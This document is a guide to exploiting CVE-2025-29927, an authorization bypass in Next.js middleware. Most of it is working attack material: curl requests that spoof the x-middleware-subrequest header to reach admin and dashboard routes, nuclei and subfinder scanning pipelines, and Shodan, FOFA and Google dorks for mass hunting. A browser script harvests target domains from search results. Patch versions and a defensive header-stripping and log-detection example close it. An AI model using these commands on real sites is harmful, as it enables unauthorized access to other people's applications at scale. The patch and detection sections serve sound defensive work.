CVE-2025-29927 - Authorization bypass via x-middleware-subrequest
Middleware in Next.js intercepts incoming HTTP requests and processes them before they reach the final route handler. It is commonly used for authentication & authorization (checking if a user is logged in), logging & monitoring (tracking requests for analytics), and request modification (altering headers or query parameters).
CVE-2025-29927 is a critical authorization bypass vulnerability in Next.js middleware. By sending a specially crafted header, attackers can bypass all middleware checks and gain unauthorized access to protected routes.
A typical middleware check of the kind the vulnerability bypasses (the missing NextResponse import has been added):

```javascript
import { NextResponse } from 'next/server';

export function middleware(req) {
  // Reject requests without a session token before they reach the route handler.
  if (!req.cookies.token) {
    return new Response('Unauthorized', { status: 401 });
  }
  return NextResponse.next();
}
```

The crafted request, with the spoofed header:

```sh
curl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/dashboard
```

Before exploiting, you need to identify whether the target is using Next.js and has vulnerable middleware. Use nuclei templates or manual probing.
```sh
# Single host
echo target.com | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yaml
# Enumerate subdomains first, then scan them
subfinder -d target.com -all | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yaml
# Deduplicate a URL list with uro, then scan
cat domains.txt | uro | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yaml
```

Once you've identified a vulnerable target, exploit the authorization bypass to access protected routes. The vulnerability works by spoofing the x-middleware-subrequest header.
```sh
# Baseline: the protected route without the header
curl -v https://target.com/dashboard
# The same route with the spoofed header
curl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/dashboard
curl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/api/admin
# Combined with a session cookie
curl -H "x-middleware-subrequest: middleware:middleware:middleware" -H "Cookie: session=valid" https://target.com/admin
```

Burp Suite provides a graphical interface for testing the vulnerability. Add the malicious header to intercept and modify requests.
```http
x-middleware-subrequest: middleware:middleware:middleware:middleware
```

Enable Proxy > Options > Match and Replace > Add header

For mass hunting, use Shodan to find servers potentially running vulnerable Next.js. Search for the x-middleware-rewrite header, which indicates Next.js is in use.
```
x-middleware-rewrite
http.html:"/_next/static"
cpe:"cpe:2.3:a:zeit:next.js"
```

Browser-console helper that extracts the IPs and domains shown in bold on the results page and downloads them as domains.txt:

```javascript
var ipElements = document.querySelectorAll('strong'),
  ips = [],
  domains = [];
ipElements.forEach(function (e) {
  var t = e.innerHTML.replace(/['"]/g, '').trim();
  // Sort each bold value into IPs or domain names.
  if (/^(\d{1,3}\.){3}\d{1,3}$/.test(t)) {
    ips.push(t);
  } else if (/^(?!\d+\.)[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/.test(t)) {
    domains.push(t);
  }
});
var dataString = 'IPs:\n' + ips.join('\n') + '\n\nDomains:\n' + domains.join('\n'),
  a = document.createElement('a');
a.href = 'data:text/plain;charset=utf-8,' + encodeURIComponent(dataString);
a.download = 'domains.txt';
document.body.appendChild(a);
a.click();
```

```sh
cat domains.txt | uro | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yaml
```

Use these dorks to discover potentially vulnerable Next.js applications through search engines.
```
shodan search: x-middleware-rewrite
shodan search: http.html:"/_next/static"
fofa: body="/_next/static" AND "x-middleware-rewrite"
google: inurl:"/_next" AND intext:"next.config.js" OR intext:"Powered by Next.js"
inurl:"/_next" AND intext:"next.config.js"
```

This vulnerability has critical impact, as it allows unauthorized access to any route protected by middleware. In severe cases, attackers can compromise the entire application.
- Unauthorized Data Access: view private user information
- Privilege Escalation: gain administrative access without credentials
- Application Takeover: complete compromise in severe cases

Next.js has released patches for all affected versions. Update to the latest version to remediate this vulnerability.
- Next.js 15.x: upgrade to 15.2.3 or later
- Next.js 14.x: upgrade to 14.2.25 or later
- Next.js 13.x: upgrade to 13.5.9 or later
- Next.js 12.x: upgrade to 12.3.5 or later

For educational and authorized testing purposes only. Always obtain proper authorization before testing.
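The upgrade above is the fix. As an added defensive example (not code from the original page), the Node.js code below shows the two controls a defender can apply at the edge while patching is rolled out: strip or reject the x-middleware-subrequest header on requests arriving from outside, and flag access-log entries that carried it. The proxy hook, the log format and the sample lines are constructed for this example.

```javascript
// Added defensive example, not from the original page. Assumes an edge proxy
// (or a Node.js handler in front of Next.js) that sees the raw request headers.
// The header is meant only for the framework's own internal subrequests, so its
// presence on an external request is both the mitigation point and the signal.
const BYPASS_HEADER = 'x-middleware-subrequest';

// Decide how the edge treats a request. mode 'block' rejects requests carrying
// the header; mode 'strip' removes it and forwards the request.
// Returns { action, reason, headers } with header names lower-cased.
function inspectRequest(headers, { mode = 'block' } = {}) {
  const normalised = {};
  for (const [name, value] of Object.entries(headers)) {
    normalised[name.toLowerCase()] = value; // header names are case-insensitive
  }
  if (!(BYPASS_HEADER in normalised)) {
    return { action: 'forward', reason: null, headers: normalised };
  }
  const reason = `external ${BYPASS_HEADER}: ${normalised[BYPASS_HEADER]}`;
  if (mode === 'block') {
    return { action: 'block', reason, headers: normalised };
  }
  delete normalised[BYPASS_HEADER];
  return { action: 'forward', reason, headers: normalised };
}

// Detection over access logs. Constructed log format for this example:
//   <ip> <method> <path> <status> hdr="<header-name>: <value>"
const LOG_LINE = /^(\S+) (\S+) (\S+) (\d{3}) hdr="([^:]+): ([^"]*)"$/;

// Return one record per request in which a client sent the internal header;
// a 200 on a route that should have answered 401 is the high-priority case.
function findBypassAttempts(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = LOG_LINE.exec(line);
    if (!m) continue;
    const [, ip, method, path, status, hdrName, hdrValue] = m;
    if (hdrName.toLowerCase() !== BYPASS_HEADER) continue;
    hits.push({ ip, method, path, status: Number(status), value: hdrValue });
  }
  return hits;
}

// Constructed sample log lines (the 401 line is an ordinary unauthenticated request).
const SAMPLE_LOG = [
  '203.0.113.5 GET /dashboard 200 hdr="x-middleware-subrequest: middleware:middleware:middleware"',
  '198.51.100.7 GET /dashboard 401 hdr="accept: text/html"',
  '203.0.113.5 GET /api/admin 200 hdr="X-Middleware-Subrequest: middleware:middleware:middleware:middleware"',
];
```

Running `findBypassAttempts(SAMPLE_LOG)` returns the two 200 responses from 203.0.113.5, which is what an alert rule for this CVE should key on.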